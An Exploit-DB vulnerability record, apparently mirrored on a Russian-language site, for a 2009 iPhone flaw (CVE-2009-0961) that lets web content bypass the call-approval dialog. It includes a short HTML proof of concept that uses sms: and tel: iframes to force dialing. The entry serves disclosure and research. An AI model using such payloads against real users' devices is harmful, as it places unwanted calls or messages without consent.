- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33044
- Проверка EDB
-
- Пройдено
- Автор
- COLLIN MULLINER
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2009-0961
- Дата публикации
- 2009-05-17
HTML:
source: https://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> <!-- second iframe is to attack quick users who manage to close the first call-dialog //--> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> </body> </html>
- Источник
- www.exploit-db.com